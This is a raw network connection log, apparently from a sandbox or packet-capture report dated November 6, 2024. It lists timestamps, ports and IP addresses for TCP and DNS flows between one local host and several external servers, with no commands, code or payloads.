                                                                                                                                                                                                            Nov 6, 2024 06:28:51.144882917 CET49746443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.160892010 CET49745443192.168.2.4185.15.59.240
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.347513914 CET4434974613.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.347546101 CET4434974613.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.347553968 CET4434974613.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.347650051 CET49746443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.347672939 CET4434974613.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.348170996 CET4434974613.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.353513956 CET49746443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.358078957 CET49746443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.358102083 CET4434974613.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.371799946 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.371856928 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.371998072 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.372139931 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.372153044 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477365017 CET44349745185.15.59.240192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477386951 CET44349745185.15.59.240192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477395058 CET44349745185.15.59.240192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477432966 CET44349745185.15.59.240192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477447987 CET44349745185.15.59.240192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477473021 CET44349745185.15.59.240192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477474928 CET49745443192.168.2.4185.15.59.240
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477485895 CET49745443192.168.2.4185.15.59.240
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.477555037 CET49745443192.168.2.4185.15.59.240
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.481499910 CET49745443192.168.2.4185.15.59.240
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.481512070 CET44349745185.15.59.240192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.211741924 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.212003946 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.212084055 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.213005066 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.213104010 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.213395119 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.213454008 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.213511944 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.255348921 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.260641098 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.260667086 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.306842089 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.458636999 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.462207079 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.462213993 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.462240934 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.462320089 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.462320089 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.462351084 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.463052034 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.463093996 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.463238955 CET4434974813.32.27.129192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.463262081 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:52.463294029 CET49748443192.168.2.413.32.27.129
                                                                                                                                                                                                            Nov 6, 2024 06:28:55.730364084 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:55.730426073 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:55.730494022 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:55.903331041 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:55.903363943 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:01.718673944 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                            Nov 6, 2024 06:29:01.724018097 CET8049723199.232.214.172192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:01.724668026 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.822386980 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.822424889 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.822479963 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.822700977 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.822711945 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.465171099 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.465476036 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.465501070 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.466379881 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.466445923 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.467588902 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.467648029 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.467742920 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.511341095 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.518753052 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.518773079 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:05.564918995 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.208842993 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.208931923 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.208996058 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.210230112 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.210253954 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.240453005 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.240484953 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.240585089 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.240858078 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.240869999 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.842485905 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.897614956 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.995429993 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.995449066 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.996480942 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.996490955 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.996570110 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.268028975 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.268029928 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.268151999 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.315928936 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.315951109 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.362802982 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.868205070 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.868298054 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.868343115 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.871150017 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:07.871172905 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:25.953439951 CET5767053192.168.2.4162.159.36.2
                                                                                                                                                                                                            Nov 6, 2024 06:29:25.958296061 CET5357670162.159.36.2192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:25.958364010 CET5767053192.168.2.4162.159.36.2
                                                                                                                                                                                                            Nov 6, 2024 06:29:25.958410978 CET5767053192.168.2.4162.159.36.2
                                                                                                                                                                                                            Nov 6, 2024 06:29:25.963247061 CET5357670162.159.36.2192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.549443960 CET5357670162.159.36.2192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.550446033 CET5767053192.168.2.4162.159.36.2
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.556022882 CET5357670162.159.36.2192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.556168079 CET5767053192.168.2.4162.159.36.2
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.710001945 CET57673443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.710046053 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.710237026 CET57673443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.710459948 CET57673443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:26.710474014 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:27.330063105 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:27.348380089 CET57673443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:27.348417044 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:27.348762035 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:27.356848955 CET57673443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:27.356914997 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:27.356986046 CET57673443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:27.403327942 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.015031099 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.015115976 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.015337944 CET57673443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.016000986 CET57673443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.016015053 CET44357673188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.021146059 CET57674443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.021172047 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.021228075 CET57674443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.021462917 CET57674443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.021469116 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.662703991 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.662961006 CET57674443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.662974119 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.663284063 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.663666010 CET57674443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.663712978 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.663791895 CET57674443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.711334944 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.862647057 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:29:28.862672091 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:29.493784904 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:29.493927956 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:29.494069099 CET57674443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:29.513768911 CET57674443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:29.513793945 CET44357674188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:37.748411894 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:37.748451948 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:37.748562098 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:37.748934031 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:37.748944998 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.474450111 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.474534035 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.476063967 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.476073980 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.476289034 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.485075951 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.531335115 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.726864100 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.726883888 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.726897001 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.726957083 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.726974964 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.726988077 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.727020979 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.842356920 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.842376947 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.842427015 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.842442036 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.842459917 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.842634916 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.958233118 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.958250999 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.958311081 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.958331108 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:38.958374023 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.073760986 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.073776960 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.073829889 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.073844910 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.073856115 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.073882103 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.189574957 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.189590931 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.189646959 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.189661026 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.189702988 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.304765940 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.304784060 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.304850101 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.304884911 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.304898024 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.305031061 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.419933081 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.419950008 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.420125961 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.420146942 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.420219898 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.535284996 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.535307884 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.535386086 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.535408020 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.535509109 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.581217051 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.581239939 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.581283092 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.581298113 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.581325054 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.581562042 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.695854902 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.695878983 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.695966959 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.695966959 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.695985079 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.696073055 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.766638994 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.766661882 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.766761065 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.766761065 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.766772985 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.766989946 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.881747961 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.881827116 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.881874084 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.881886005 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.881920099 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.882760048 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.982697010 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.982718945 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.982827902 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.982827902 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.982846022 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.985836983 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.997262955 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.997332096 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.997364044 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:39.997405052 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.091183901 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.091183901 CET57675443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.091213942 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.091223955 CET4435767513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.132616043 CET57676443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.132669926 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.132834911 CET57676443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.133841038 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.133892059 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.134078026 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.135356903 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.135375977 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.135442972 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.135766029 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.135773897 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.135879040 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.136172056 CET57676443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.136172056 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.136188030 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.136193037 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.136562109 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.136573076 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.136990070 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.137001038 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.138065100 CET57680443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.138092041 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.138223886 CET57680443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.138339043 CET57680443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.138346910 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.199572086 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.199625015 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.199739933 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.199944973 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.199959993 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.816148996 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.816498041 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.816518068 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.817619085 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.818083048 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.818242073 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.818248034 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.859333038 CET44357681188.114.96.3192.168.2.4
